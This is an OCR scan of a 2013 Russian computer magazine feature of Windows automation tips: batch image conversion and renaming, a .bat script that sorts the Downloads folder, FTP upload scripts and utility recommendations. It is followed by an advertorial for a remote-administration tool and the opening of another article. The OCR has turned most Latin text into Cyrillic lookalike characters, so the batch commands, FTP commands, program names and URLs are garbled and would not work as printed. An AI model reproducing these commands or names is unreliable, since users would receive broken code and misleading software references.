Іітоѵѵгескббб @ ѵ/ѵѵѵ/ Л іскг.сот 
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Чертова дюжина рецептов 



ПАКЕТНОЕ ПРЕОБРАЗОВАНИЕ И ПЕРЕИМЕНОВАНИЕ ГРАФИЧЕСКИХ ФАЙЛОВ 



Данный совет подойдет всем, кто много работает с графическими файлами 
разных форматов. Лично мне по роду деятельности приходится часто пре- 
образовывать графические файлы из одного формата в другой, например, 
скриншоты создаются в формате РИО, а в типографию нужно предоставить 
файлы в формате ТІРР или ВМР. По одному преобразовывать несколько со- 
тен файлов — занятие неблагодарное. Поэтому сейчас мы поговорим о про- 
грамме Раз!5іопе Ітаде Ѵіеѵѵег (іа зізіопе . огд ). которая не только отличный 
просмотрщик, но и умеет выполнять много полезных действий над файлами, 
в том числе пакетное преобразование, изменение размера и переименова- 
ние графических файлов. 

Использовать программу предельно просто. Запусти ее и перейди 
в каталог, где находятся файлы, которые нужно преобразовать. Выдели 
нужные файлы (или используй <С!гІ + А> для выделения всех файлов), 
нажми <РЗ> для отображения диалога «Пакетное преобразование/пере- 
именование» (рис. 1). Выбери формат файла, в который нужно преобразо- 
вать. В данном случае все мои файлы в формате РЫО, а преобразовываю 
я их в ЗРО. Если выключить параметр «Выходная папка», то файлы будут 
помещены в ту же папку, где находятся исходные файлы. Если этот пара- 
метр включен, то файлы будут помещены в папку, указанную в нем. Кноп- 
ка «Установка» позволяет установить параметры выходного графического 
формата, например качество для ЗРЕС или сжатие для ТІРР. 

Для изменения других параметров, например размеров изображений, 
нажми кнопку «Дополнительно». В появившемся окне можно будет на- 
строить параметры выходных файлов, например размер (который можно 
задать как в пикселях, так и в процентах), параметры поворота и другие 
(рис. 2). Очень часто используется изменение размера, поворот (для фо- 
тографий) и водяной знак (программа позволяет наложить водяной знак, 
чтоб хоть как-то защитить изображения от кражи при публикации в интер- 
нете). 

Нажми «ОК» для возврата к предыдущему окну. Обрати внимание 
на параметр «Изменять настройки»: если он выключен, установленные ра- 
нее параметры не будут применены. Для начала преобразования нажми 
кнопку «Старт». По завершении преобразования ты увидишь окно-отчет, 
которое я не привожу из экономии места в журнале. 




Рис. 1 . Диалог «Пакетное преобразование/переименование» 



Для пакетного переименования используется вкладка «Пакетное пе- 
реименование» (быстрый доступ к которой можно получить с помощью 
<Р5>). Далее все просто: выбери файлы (если они были выделены перед 
вызовом диалога, то они уже выбраны), установи шаблон и нажми «Старт». 
Кнопка «?» напротив шаблона объясняет, какие подстановки можно ис- 
пользовать в шаблоне. 

Кроме программы Раз! Зіопе Ітаде Ѵіеѵѵег, можно порекомендовать 
программу Ѵ50 Ітаде Пезігег ( ѵзо -зоІТѵѵагеТг ) — она также позволя- 
ет производить пакетное изменение размера, а что касается шаблонов 
имен при переименовании файлов, то тут мне программа ѴЗО Ітаде 
РІезігег даже больше нравится. Например, можно использовать шаблон 
%Р [%Р] для получения имени вида «исходное имя [разрешение]» (3-1 ,рпд 
[800x600]} — полезно, когда нужно хранить несколько версий одной кар- 
тинки, но с разными разрешениями. 



Доп о л м ительно 


РОК 




Л Изменить размер Поворот Обрезать Холст Глубина цвета Настрой ют изображения 0Р| Текст Водяной знак 


* ► 



1 И&меттть размер 



9 пикселах о в процентах Изменить размер (расчёт по одной из сторон) 



Проценты. 90.00 * % -Выбор процента* 



Фил ы р: Іэ п се ( п о ум о л на м и ю ^ 



Сбросита все 



Загрузить и а стройки из файла 



Сохранить настройки в файле 



а 



ск 



Отмена 



Рис. 2. Дополнительные параметры преобразования 
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Сортнрзе.-кэ 
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/ Старт 



ПАКЕТНОЕ ПРЕОБРАЗОВАНИЕ 
КОДИРОВКИ ФАЙЛОВ В ІЛТ-8 



Для пакетного преобразования кодировки файлов (например, 1251) 
в ІІТР-8 можно использовать программу ІІТРСаз! Ехргезз (: юо. 
аІ/ЗКІКг ). Просто выбери исходный каталог (Зоигсе сіігесіогу) и це- 
левой каталог (Тагде! сіігесіогу), а затем нажми кнопку 3!аг!. 



Ш ІЛТСМ Ехргезз 




1^ Г 



Бстгсе Йгесіагу 


Вгоѵѵзе 






Тагдеі сіігесТогу 


Бгошзе 










Р Р-есигЕіѵе [~ Сору Ыпсопѵеггесі Ѵ]ѴУгііеВОМ Ое!ес!ОпІу |Ехі! ѴѴЬеп Оопе 


АЬоиІ 


ЕхЦ 



Рііе 



Елсрсііпд 



$1а!е 




Рис. 3. Пакетное переименование 



Рис. 4. Программа ЦТРСав! Ехргезз 
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СО РТИ РОБКА ФАЙЛОВ В ПАПКЕ СВОИМИ РУКАМ И 



ХАКЕР 11/178/2013 



У всех нас есть каталог ОоѵѵпІоасІз, в котором чего только нет. Каждый раз 
сортировать его — лень. Поэтому предлагаю написать сценарий на языке 
командной оболочки ѴѴіпсІоѵѵз, который будет выполнять сортировку фай- 
лов за нас. Сценарий — это просто набор команд. В нашем случае это будут 
команды создания необходимых каталогов и перемещения файлов в зави- 
симости от их типа в разные каталоги. Предлагаю создать каталоги агсбіѵез 
(сюда будут перемещены архивы), тизіс (сюда будет перемещена музыка), 
ѵісіео (для видео), ргодгатз (ЕХЕ-файлы), рбоіоз (исключительно для ІРЕО- 
файлов), ітадез (остальные картинки), ізо (для 150-образов), босз (докумен- 
ты), Тоггепі-файлы предлагаю удалять вообще — от них толку мало. Названия 
каталогов могут быть другими, «по образу и подобию» ты можешь написать 
собственный сценарий, адаптировав его под свои нужды. 

Итак, не будем тянуть, а сразу приступим к разработке сценария (команда 
гет — это комментарий, она ничего не делает). Чтобы не увеличивать размер 
сценария, для каждой группы файлов я привел не все типы, но в большинстве 
случаев и этого будет вполне достаточно. К сожалению, команда тоѵе не по- 
зволяет перемещать сразу несколько групп файлов, то есть ты не можешь на- 
писать «тоѵе *.рсІТ,*.сІос сіосз». Чтобы не писать несколько последовательных 
команд тоѵе, что не очень красиво, мы используем цикл Іог для обработки 
списка типов файлов. Сценарий нужно назвать огбег.ЬаІ и поместить в ката- 
лог Ооѵѵпіоасіз. Потом запусти сценарий — дважды щелкни на нем в окне про- 
водника. 

Код сценария огбег.ЬаІ: 

пет Проверяем существование и создаем необходимые каталоги 

іі поі ехізі "агсЬіѵез" тсі "агсЬіѵез" 

іі поі: ехізі "ізо" тсі "ізо" 

іі поі: ехізі; "тизіс" тсі "тизіс" 

і-р поі: ехізі "ѵісіео" тсі "ѵісіео" 

і-р поі ехізі "ргодгатз" тсі "ргодгатз" 



іі поі ехізі "рЬоіоз" тсі "рЬоіоз" 
іі поі ехізі "іта§ез" тсі "іта§ез" 
іі поі ехізі "сіосз" тсі "сіосз" 

гет Перемещаем архивы часто используемых типов в агЬіѵез 

іог %%і іп (*. гір л *_._і§ 2 л * . гаг) сіо тоѵе "%%і" "агсіііѵез" 

гет 150-файлы - в каталог 150 

тоѵе * . ізо ізо 

гет Виде о - в к аталог ѵісіео 

іог % % і іп (*.аѵі.*.тоѵ.*.тр4.*.ткѵ.*.З рр ) сіо тоѵе " % %і" *-> 
"ѵісіео" 

гет Музыка (в основном это МРЗ-файлы) 

тоѵе *.трЗ тизіс 
гет .Программы и фото 
тоѵе *.ехе ргодгатз 
тоѵе *>ЗРё рбоіоз 
гет -Изображения 

іог %%і іп (* . рп§, * . Ьтр, * . §іі, * . іііі) сіо тоѵе "%%і" "іта§е$" 
гет Документы 

іог % % і іп (* . рсіі . *.іх і^*. сіос. *.с іос х.*.хі5) б о т оѵе " %%і " <-■ 
"аосз" 

гет Удаляем торрент-файлы 
сіеі *.іоггепі 

После такой уборки в каталоге Эоѵѵпіоасіз станет значительно простор- 
нее. В нем останутся лишь те файлы, которые не были затронуты сценари- 
ем. Не следует пытаться изменить его так, чтобы он обрабатывал вложенные 
папки в каталоге Ооѵѵпіоасіз: ведь в них обычно находятся связанные группы 
файлов. Например, когда загружаешь торрент с программой, он помещает- 
ся в отдельный каталог, в котором находится программа и необходимые ей 
файлы. 




ПАКЕТНОЕ 

ПЕРЕИМЕНОВАНИЕ 

ЛЮБЫХФАЙЛОВ 



Представим, что ты пишешь какой-то научный 
труд и у тебя собралось много файлов вида 5-1. 
Ъплр, 5-2,Ьтр и так далее. Все понятно: это изо- 
бражения к пятому разделу (главе, параграфу...). 
Но потом нумерация разделов изменилась, и раз- 
дел 5 стал разделом 7. Переименовывать файлы 
вручную не очень удобно. Открой командную 
строку и перейди в каталог, в котором находятся 
твои файлы, например: 

ссі с :Діезі 

Далее введи команду 

геп 5-?.рп§ 7-?.рп& 

Если в каталоге есть файлы вида 5-??.рпд (5- 
10,5-11), тогда понадобится еще команда: 

геп 5-??.рп§ 7^??.рп§ 

Сложнее ситуация, когда раздел 5 стал раз- 
делом 12, например. Чтобы ее упростить, я реко- 
мендую изначально использовать 0 при нумера- 
ции файлов, например 05-01. рпд, 05-02. рпд, ..., 
05-21. рпд. Тогда вопрос переименования реша- 
ется одной командой: 

геп 05-??.рп§ 12-??.рп§ 



АВТОМАТИЗАЦИЯ СОЗДАНИЯ СКРИНШОТОВ 



Представим, что тебе нужно создать скриншот и опубликовать его в интернете, чтобы 
была возможность вставить ссылку на него где-то на форуме. Последовательность дей- 
ствий примерно такая: нажать < Ргіпі 5сгееп> (или <АІ1 + Ргіпі 5сгееп>, или <Рп + АН + Ргіпі 
5сгееп> на некоторых ноутбуках), вызвать Раіпі (или другой графический редактор), на- 
жать < Сігі + Ѵ> для вставки скриншота, нажать <СігІ + 5> для сохранения файла, затем от- 
крыть браузер, перейти на сайт файлообменника, нажать кнопку ІІрІоасІ, выбрать файл... 
Не слишком ли много действий для такой простой задачи? 

Для ее автоматизации нужно установить клиент ОгорЬох версии 2.4 или более новой. 
Затем нажми одну из комбинаций <Ргіп1 5сгееп>, <АІ1 + Ргіпі 5сгееп>, <С1гІ + Ргіпі 5сгееп>, 
<С1гІ + АН + Ргіпі 5сгееп> для создания скриншота. Комбинации <Ргіп1 5сгееп>, <АН + Ргіпі 
5сгееп> создадут скриншот всего экрана или активного окна соответственно и поме- 
стят файл в каталог РгорЬох (после синхронизации файлы станут доступны в интернете). 
А аналогичные комбинации с <С1гІ> не только создадут скриншот и поместят его в каталог 
ОгорЬох, но и скопируют на него ссылку в буфер обмена. Все, что тебе осталось сделать, — 
это перейти на форум или другой сайт и вставить ссылку в форму создания/редактирова- 
ния сообщения. 

Есть второй случай, требую- 
щий автоматизации. Представим, 
что тебе нужно сделать скриншот 
веб-страницы. Одного нажатия 
<АІ1 + Ргіпі 8сгееп> будет недо- 
статочно, особенно если веб- 
страница не помещается на одном 
экране. Что делать? Несколько на- 
жатий <АІ1 + Ргіпі 5сгѳеп>, а потом 
мучения в графическом редакто- 
ре? Это не наш вариант. Я пред- 
лагаю установить расширение 
Зсгееп Саріиге Ріидіп для брау- 
зера СПготе. Использовать его 
предельно просто: нажми кноп- 
ку расширения и выбери, какой 
скриншот нужно сделать (рис. 5). 

После чего скриншот будет ото- 
бражен в окне браузера и его нуж- 
но будет сохранить, нажав соот- 
ветствующую кнопку. 




Область захвата 



ГГ 



□ Захват видимой части 



П 



Ш+'ЧІІ+Ѵ 



ахЕат всей страницы 



лгі+АІІ+Н 



Захват области экрана 



Орііопз 




Рис. 5. Расширение 5егееп Саріиге 
Ріидіп для браузера СИгоше 
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Чеотова дюжина рецептов 



УДАЛ ЕННОЕ УПРАВЛЕНИЕ ТОРРЕНТОМ С АНДРОИД-УСТРОЙСТВА 



Торрент-клиентом иТоггепі можно управлять уда- 
ленно — с планшета или смартфона. Это означа- 
ет, что ты можешь сидеть где-то в кафе и управ- 
лять закачками на своем домашнем компе. Тема 
изъезжена, и многим покажется, что это баян. 
Но это не так. Недавно я попытался реализовать 
все на своем компе. И у меня ничего не получи- 
лось, поскольку архив с веб-интерфейсом был 
удален с сайта ЩоггепТсот. Пришлось искать 
его на просторах интернета. В результате я выло- 
жил его на своем сайте (сІкуѵз.огд.иаДіІез/ѵѵеЬиі, 
2ір). Если ты уже раньше настраивал удаленное 
управление торрент-клиентом, можешь восполь- 
зоваться этим файлом. Дальше ничего нового 
для тебя не будет, и можешь переходить к следу- 
ющему разделу статьи. 

А для тех, кто не знает, расскажу, как все орга- 
низовать. Упомянутый файл нужно, не распаковы- 
вая (!), поместить в каталог С:\Ызегз\{имя учетной 
записи}\АррЭа1:а\Поатіпд\иТоггеп1:. 

Далее нужно выбрать команду меню «На- 
стройки > Настройки программы», в разделе 
«Веб-интерфейс» включить параметр «Исполь- 
зовать веб-интерфейс», изменить пароль адми- 
нистратора (можно и имя пользователя). Также 
желательно включить альтернативный порт 8080, 
так как со стандартным портом у меня возник- 
ло небольшое недоразумение (рис. 6). На этом 
настройка иТоггеШ: завершена. Открой брау- 
зер на планшете и введи ІІВ1_: Ігйр://ІР-адрес- 
компа:8080/диі/. Веб-интерфейс управления 
торрент-клиентом изображен на рис. 7. В локаль- 
ной сети все будет работать нормально, а чтобы 
ты мог управлять своими закачками извне, нужно 
также настроить брандмауэр на твоем домашнем 
роутере и самом компе с иТоггеЩ (разрешить вхо- 
дящие извне на порт 8080). 



г 

Настройки 









Общие 
■■ Интерфейс 
- Папки 
Соединение 
Скорость 
■■■ ВгіТоггепі 
Лимит трафика 
•• Очередность 
Планировщик 
■ Удаленный доступ 
В о спро изведен ие 
■■■ Парные устройства 
0- Дополнительно 

Расширения ин 
Кэширование 
■ Веб- интерфейс 
Запуск програь 



гтт 



| У с пользовать веб- интерфейс! 

Учётная запись 

Имя; асітіп Пароль; ***** 

Ц Разрешить гостевой вход с именем: дией 

Настройка соединения 

ѵ| Альтернативный порт (по умолчанию - порт соединения): 
Доступ только с этих ІР-адресоЕ (разделяйте адреса запятыми): 



в. 



8030 



Папки загрузки 



Добавить 



Удалить 



ОК 




Отмена 




При мен ить 



Рис. 6. Настройка иТоггепІ 
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Рис. 7, Веб-интерфейс 



СОЗДАЕМ ПОЛЕЗНЫЕЯРЛЫКИ 




Иногда полезно создать на рабочем столе ярлыки вызо- 
ва разных системных действий, например выключение 
компьютера, перезагрузка, выход из системы, сон. Осо- 
бенно меня поймут пользователи ѴѴіпсІоѵѵз 8, где, если 
не установить программы вроде СІаззіс ЗГіеІІ, выключе- 
ние обычного компа (не планшета) или его перезагрузка 
напоминает танцы с бубном. 

Необходимые ярлыки можно создать вручную. 
Но это неинтересно. Ведь если речь в статье идет об ав- 
томатизации, то и эту затею нужно автоматизировать. 
Есть очень полезная программа — Напбу Збогісиіз ( сюо. 
аІ/8гѴ51Чо ). позволяющая с помощью одного клика (для 
каждого ярлыка) создать все необходимые тебе ярлыки. 
Всего программа может создать 20 полезных ярлыков, 
совершенно бесплатна и не требует установки — просто 
скачай архив с программой и запусти ее (рис. 8). 

Лично я рекомендую создать следующие ярлы- 
ки: ЗГщМоѵѵп и Яезіагі (вкладка Вазіс) и За^еіу Петоѵе 
Нагсіѵѵаге (вкладка АбѵалсесІ). Первый ярлык — за- 
вершение работы системы, второй — перезагрузка, 
третий — безопасное отключение сменных устройств 
(ІІЗВ-диски, флешки и прочее). Также программа по- 
зволяет создать ярлыки включения/выключения бранд- 
мауэра, очистки буфера обмена, открытия диспетчера 
устройств и другие. Программа работает в \МпсІо\л/з 
Ѵіз!а, 7 и 8 (поддерживаются как 32-, так и 64-битные 
версии). 
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Рис. 8. Программа 
Напсіу ЗИогІсиІз 
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РТР -СЦЕНАРИИ: АВТОМАТИЗАЦИЯ 
ПЕРЕДАЧИ ФАЙЛОВ ПО РТР 



Сценарии командной строки очень полезны, но ими часто пре- 
небрегают — то ли от незнания, то ли от лени. А автоматизиро- 
вать с их помощью можно все что угодно. Иногда бывает нужно 
периодически загружать/выгружать какие-то файлы с/на РТР. 
Запустив команду Йр с параметром -5, можно задать текстовый 
файл, содержащий РТР- команды, которые выполнит програм- 
ма Йр.ехе, 

Создай файл ирІоаб.Ьаі. Мы его будем использовать для за- 
грузки всех М-файлов из локального каталога с:\!е5І в удален- 
ный каталог ітр нашего РТР-сервера. В этот файл помести все- 
го одну строчку: 

-РТр -п - 5 : со штаііеіа .Тір 

Параметр -п запрещает автоматический вход на сервер 
(входом будем управлять вручную), а второй задает текстовый 
файл с командами РТР-клиента, которые будут или выполнены 
локально, или переданы серверу (в зависимости от команды). 
В нашем случае соттапсІз.Йр следующий: 

орел сервер 

ІІ5ЕК пользователь 

пароль 

Ыпагу 

ссі Ттр 

Ісб с:\бе$Т 

рготрТ 

триб * .Тхб 

Ьуе 

Обрати внимание: пароль указывается в отдельной строке 
после указания имени пользователя. Команда Ыпагу включает 
двоичный режим обмена информацией. Команда сб изменя- 
ет каталог на РТР-сервере, Ісб — ■ на локальном компе. Коман- 
да рготр! отключает режим подтверждений для команд три! 
(множественная загрузка файлов на сервер), тде! (множе- 
ственная загрузка файлов с сервера). Команда Ьуе завершает 
работу сценария. 

Данный сценарий легко переделать в сценарий, загружаю- 
щий файлы с сервера. Для этого достаточно команду три! за- 
менить на тде!. 

Я привел довольно тривиальный пример. Но ты можешь 
существенно его расширить. Никто тебе не мешает добавить 
перед вызовом команды Йр команды, создающие архив катало- 
га БД. Например: 

гаг а с : \1:ез1:\Ьаскир ._гал (ЭЬаекир . Із!: 

Эта команда создаст архив Ьаскир.гаг по всем файлам, ука- 
занным в текстовом файле Ьаскир.із!. После этого в соплплапбз. 
Йр нужно изменить три! *.!х! на три! *.гаг. 



С:Ч1ек1>Т1р — п -5 : сотпапсІБ _ Е 1; р 
^р> ореп сікшз . огд , иа 
Связь с ШтЮрОрд.иа. 

22Ш РгоРТРВ 1.3.3с Бегѵег геайу. 

Тір> У&ЕК гікіізогр 

ЗЗІ РаБЕиогй гедиігей Гог Йкигогди 

230 Цзег йкы&огди Іоддеіі іп 
Т1р> Ыпагу 
2ШѲ Туре Іо I 

Т1р> ей Ігор 

25Ш СШ сошпапсі зиссеззРи! 

Тір> Іей с:\1еБІ 

Текущий локальный каталог С=\1е5І. 

Тір> ргопрЬ 

Интерактивный режим Быкл . 

Тір> гориі *-1х1 

2ШШ РОЯТ соппапД БиссвББГиІ 

150 Орепіпд БІНАЯѴ РюсЛе Йаіа соплесііоп Тог 1.1x1 
226 ТгапзТеі* сотріеіе 

Тірг 4 байт отправлено за 0,17 Ссек> со скорость» Ѳ,Ш2 <КБ/сек>. 
2ШШ РОНТ сошіапй зиссеБзГиІ 

150 Орепіпд ВІЫЙЯѴ пойе йаіа соппесііоп Тог 2.1x1 
226 ТгапзГег сопріеіе 

Тір: 4 байт отправлено за 0,12 Ссек> со скоростью 0,ШЗ СКБ/сек>. 
Т1р> Ьуе 
221 СоойЪуе . 



АВТОМАТИЗАЦИЯ РУТИННЫХ ДЕЙСТВИЙ 



Интерфейс ѴѴіпбоѵѵз очень удобен: одни окна да 
кнопки. Пользователю нравится. А вот админи- 
стратору — не очень. Часть задач можно решить 
с помощью скриптов, которые выполняются в кон- 
соли, но для некоторых приходится каждый день 
нажимать одни и те же кнопки, открывать одни 
и те же окна. Для автоматизации таких рутинных 
задач используются специальные программы 
вроде Аи!оі! или х5!аг!ег. Программы запоминают 
последовательность выполненных действий и по- 
зволяют запускать ее, когда будет нужно. 




ТРАНСЛИТЕРАЦИЯ 
ИМЕНФАЙЛО 



На дворе 2013 год, а мой не очень современный автомобиль не умеет читать 
МРЗ, Поэтому я решил купить американо-китайский (написано, что сделано 
в США, но все мы знаем, где делают такие девайсы) блок, способный читать 
МРЗ-файлы с флешки. Устройство меня вполне устраивает, но у него есть 
одна не очень хорошая особенность. Как ни странно, оно нормально работает 
с русскими ЮЗ-тегами и правильно вы водит их на монитор, но не умеет читать 
файлы с флешки, если в них есть русские буквы. Устройство просто не ви- 
дит такие файлы. Поэтому перед помещением их на флешку приходится их 
переименовывать, а это довольно рутинная задача. Для ее решения я нашел 
простенькую программу ПизТоЕпд Пѳпатег ( кіІопе!.пт.ги ). Использовать ее 
очень легко (рис. 10). Из меню «Выбрать» выбери команду или «Файлы» (для 
выбора файлов), или «Папка» (для выбора папки, которая содержит файлы 
с русскоязычными именами). После того как файлы будут добавлены в спи- 
сок, нажми кнопку «Переименовать». Вот и все. Программу можно закрыть. 

Для более сложного переименования, особенно МРЗ-файлов, лучше ис- 
пользовать программу РіІеЯепатег (доа аІ/М 0 Н4І ) . Однако в моем случае 
возможностей ПизТоЕпд Пепатег мне оказалось вполне достаточно. 



-п -е :саттапйз .Тір 
Тір> ореп Йкі-іЕ „огд.иа 
Связь с Йк*т .огдаш- 

220 РгоРТРВ 1.3 -Зс Сегмег геайу. 

Т1р> В8ЕН Йкиеогди 

331 Раэеиогй гедиігей Тог Йкизогди 

230 Цеег Йкизогди Іоддей іп 
Т1р> Ыпагу 
200 Туре зеі Іо I 
Тір> ей Іпр 

250 СѴ№ сотпапй зиссеззТіл! 

Тір> Іей с "Мег! 

Текущий локальный каталог С:\1ез=1- 
Т'1р> ргопрі 

Интерактивный режим Быкл. 

Тір> прі 1x1 

200 РОЯТ соптапй зиссеззТідІ 

150 Орепіпд ВІНЙВѴ пойе йаіа соппесііоп Тог 1.1x1; 

226 ТгапзТег сопріеіе 

Тір: 4 байт отправлено за 0,17 (сек) со скоростью 0,02 <КБ/сек>. 
200 РОЯТ союгаапй зиссезсТиІ 

150 Орепіпд ВІЫЙИѴ іпойе йаіа соппесііоп Тог 2 .1x1 
226 ТгапзТег соіпріеіе 

Тір: 4 байт отправлено за 0,12 <еек> со скоростью 0,03 <КБ/сек>, 
Тір> Ьуе 

221 СооЙЬуе . 

С:\1е5І>_ 



Рис. 10. Программа ВивТоЕпд Вепатег 
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Одно из преимуществ І_іпих (да и почти любой ІІЫІХ-системы) — встроенные менеджеры пакетов, позволяющие автоматизи- 
ровать установку, удаление, а также обновление софта. Автоматизация установки и удаления заключается в обработке зави- 
симостей. Например, если программа А зависит от программы Б, то при попытке установки программы А будет также уста- 
новлена и программа Б, Аналогично при удалении программы Б будет удалена и программа А, поскольку она зависит от Б. 

Менеджеры пакетов также позволяют контролировать наличие обновлений программ. При желании ты можешь обно- 
вить весь установленный софт одной командой. При этом не нужно отдельно отслеживать, есть ли обновления для той или 
иной программы. Если они есть, они будут установлены. 

С недавнего времени такие менеджеры стали доступны и для пользователей ѴѴіпбоѵѵз. К сожалению, рассмотрение 
подобных менеджеров — тема для отдельной статьи, а я лишь подскажу, в каком направлении копать. Пакетный менеджер 
Сітосоіаіеу ( сію соіаіеу . о г д ) позиционируется как арі-деідля ѴѴіпбоѵѵз, также можно использовать ЫрасксІ отСоодІе (доо. 
дІ/М24ЬСС). М іеговой тоже выпустила собственный менеджер ІЧиѲеІ (пидеі.сосіеріех.соі ; ). 



споши СПЕЦИАЛЬНО ДЛЯ МАКОВОДОВ 



СгоѵѵІ — универсальная глобальная система оповещения пользователя в 05 X. Использует- 
ся многими программами, например для вывода уведомлений о новом почтовом сообще- 
нии, о низком заряде батареи, о вставке ЕІ 5 В- устройства. Пользователи 05 X от нее в пол- 
ном восторге и сетуют, что, когда приходится работать в ѴѴіпсІоѵѵз, ее им очень не хватает. 
С недавнего времени СгоѵѵІ появился и для ѴѴіпсІоѵѵз ( д гоѵѵІТо г . ѵі п сіоѵѵз. сот/с йѵѵ) 

СгоѵѵІ — штука полезная, но нужно, чтобы приложения его поддерживали ( доо.ді/ 
а]ѴѴРЮ). Среди них: Рісідіп, РігеТох, ТИипсІегЬігсІ, иТоггепІ, ѴѴіпАМР, Оиііоок и многие другие. 



->> 



СгоѵѵІ 


















йепегаі АррІісаЙоп* Онріауз ЫеЬ'ѵогк 5есигіЬ/ 



Нк іо гу 



АЬоуі 



АррИсаЙоп Мате 



N 0 АррІісаііоп5 Наѵе Ке§і 2 ІегееІ Уеі 

МЬеп а ОгоѵѵІ-епаЫесі арріісаііоп гедг5іег5 Іо 5епс] поіШсаГіопБ, ііѵѵііі 
арреаг іп Йіе Изі Іо Ше Іей апсі уоа ѵѵііі Ье аЫе Іо сизіотйе зейіпдз. 



Рис. 11 . СгоѵѵІ для ѴѴіпсІоѵѵз 




ВСТАВКА ТЕКСТА БЕЗ ФОРМАТИРОВАНИЯ 



Очень часто при копировании текста в ѴѴогб, браузере или других про- 
граммах копируется и ненужное оформление. Существует несколько спо- 
собов решить эту проблему. Один из них — программа РІаіпРазІе { 

!> !). Она не требует установки, а при запуске просто сворачивается 

в трей. Обычное нажатие <СіхІ + Ѵ> вставляет текст как есть, а двойное 
(нужно быстро дважды нажать <С1т1 + Ѵ>) — текст без форматирования. 
Также функция вставки текста без форматирования есть у Рипіо Сѵѵіісііег: 
нужно нажать <СІгІ + Міп + Ѵ>. 




Есть небольшая, но удобная программа, благо- 
даря которой ты забудешь и главное меню, и яр- 
лыки на рабочем столе, и файловый менеджер. 
Просто установи программу и начинай вводить 
что-то, а она сама предложит допустимые вари- 
анты — или запустить программу, или открыть 
файл. Не нужно блуждать по дебрям меню, панели 
инструментов или диску. За тебя все сделает про- 
грамма. Сначала не понимаешь, зачем она нужна, 
но, поработав с ней день, уже не можешь отка- 
заться. 

На этом все. Надеюсь, ты найдешь, как приме- 
нить приведенные рецепты на практике. ИНИ 




ГЧоІерасі 
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Рис. 12. Программа Іаипсііу 








Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшиесовесть распростра- 
нители не стесняются продавать журнал подвойной цене. 
Во-вторых, это удобно. Не надо искатьжурнал в продаже 
и бояться проморгать момент, когда весьтиражуже раз- 
берут. В-третьих, это быстро (правда, это правило действует 
не для всех): подписчикамсвежий выпуск отправляется рань 
ше, чем он появляется на прилавках магазинов. 
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Новая версия программы Удаленного управления ЬііеМападег 4 . 




с функциями режима технической поддержки и записи э 



Сегодня компьютеры стали частью не только нашей жизни — это очень важная часть жизни 
и наших родителей и даже бабушек и дедушек. Их познания в компьютерах невелики, а нередко 
и вовсе равны нулю. Поэтому иногда приходится помогать неопытным пользователям в самых 
простых вопросах: настраивать «Одноклассники», устанавливать или обновлять антивирус 
и даже объяснять, что такое браузер и как с ним работать. Программа ІЛеМападег прекрасно 
подойдет для технической поддержки удаленных пользователей или для администрирования 
компьютерного парка из нескольких сотен машин. 



ОКДЗДНИЕТЕХПОДДЕРЖКИ 

Для оказания техподдержки удаленному поль- 
зователю необходимо запустить программу 
ВОМЗегѵег.ехе. Это серверный модуль програм- 
мы ІЛеМападег, его можно загрузить отдельным 
файлом с сайта Іііетападег.ги или взять из уста- 
новочного дистрибутива с программой. 

После запуска программа автоматически сге- 
нерирует уникальный Ю и временный пароль — 
они понадобятся для подключения к данному 
компьютеру через интернет. 

Теперь для подключения к удаленному компью- 
теру необходимо запустить у себя клиентский мо- 
дуль ИОМѴіеѵѵег.ехе (его можно скачать отдельным 
файлом с официального сайта или взять из уста- 
новочного дистрибутива). Открой окно соедине- 
ния по Ю и укажи Ю удаленного компьютера, после 
удачного соединения программа попросит пароль 
для доступа к удаленному компьютеру — укажи па- 
роль, выданный серверному модулю программы. 



После удачного подключения ты сможешь 
удаленно управлять компьютером; например, 
можно подключиться к рабочему столу удаленно- 
го пользователя и с помощью своей мышки и кла- 
виатуры сделать все, что нужно. 

Программа ІЛеМападег предоставляет более 
десяти отдельных режимов работы. Помимо уда- 
ленного управления рабочим столом, ты сможешь 
на удаленном компьютере запускать или открывать 
файлы, обмениваться файлами между компьюте- 
рами, управлять процессами или сервисами, ре- 
дактировать реестр, управлять питанием, отправ- 
лять отдельное сообщение и общаться в режимах 
текстового или аудиовидеочата, провести инвен- 
таризацию и многое другое. Все эти режимы могут 
пригодиться для решения поставленных задач. 

АДМИНИСТРИРОВАНИЕ КОМПЬЮТЕРОВ 

Программа УІеМападег отлично подойдет 
и для администрирования небольшого или круп- 



(55 Ь г .еМападег 
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Взш 10: 



Пароль: 



185456 



3793 
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Серверный модуль программы 



Клиентский модуль программы 



ного парка компьютеров. В установочном дис- 
трибутиве программы находятся два модуля: 
серверный модуль, который устанавливается 
на удаленных машинах, и клиентский модуль, 
устанавливаемый на компьютерах администра- 
торов. Установить программу на удаленные 
компьютеры можно несколькими способами: 
вручную из дистрибутива или воспользоваться 
встроенным средством удаленной установки 
программы. После этого во Ѵіеѵѵег необходимо 
создать новые соединения, указывая ІР- или 10- 
адрес компьютера, для более быстрого добав- 
ления можно воспользоваться поиском компью- 
теров по сети и автоматическим добавлением их 
в список. 

В дальнейшем ты сможешь постоянно контро- 
лировать работу удаленных компьютеров, наблю- 
дая за ними в главном окне программы. Режим 
записи экрана по расписанию позволяет настро- 
ить автономную запись рабочего стола удаленно- 
го компьютера в отдельный файл, после чего мож- 
но подключиться и просмотреть, что происходило 
в течение дня на рабочем столе компьютера. 

Особенно интересны возможности настройки 
личного Ю-сервера. Это отдельное бесплатное 
приложение, которое в программе называется 
N01 Р, позволяет связывать между собой сервер- 
ную и клиентскую части по Ю-протоколу. Настро- 
ив такой Ю-сервер у себя в организации, можно 
получить полностью автономную систему техни- 
ческой поддержки пользователей, при этом ис- 
ключив вероятность проникновения извне. 

ПОСТАВКА 

Программа ЫіеМападег представлена двумя вер- 
сиями: Рго — полная версия программы со всеми 
возможностями, подходящая для крупных орга- 
низаций, и Ргее — бесплатная для физических 
и юридических лиц, позволяет управлять 30 ком- 
пьютерами бесплатно без каких-либо ограниче- 
ний по времени работы. 
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Каким тараканам обязан мир ГГ 

Анархисты, отшельники, наркоманы, сумасшедшие, 
жулики и люди других самых экзотических мировоз- 
зрений, привычек и качеств могут быть изобретателя- 
ми всем известных вещей. 




С уществует стандартный образ успешного айтишно- 

го предпринимателя: он научился программировать 
до того, как пошел в школу, застал зарю современ- 
ных технологий, окончил престижный колледж... 
Или даже не окончил, а убежал оттуда, чтобы как можно 
скорее основать свою компанию. Не проходит и пары лет, 
как стартап «выстреливает» и его покупает какая-нибудь 
мегакорпорация. Там наш архетипичный предприниматель 
для порядка работает год -другой и, приумножив связи и опыт, 
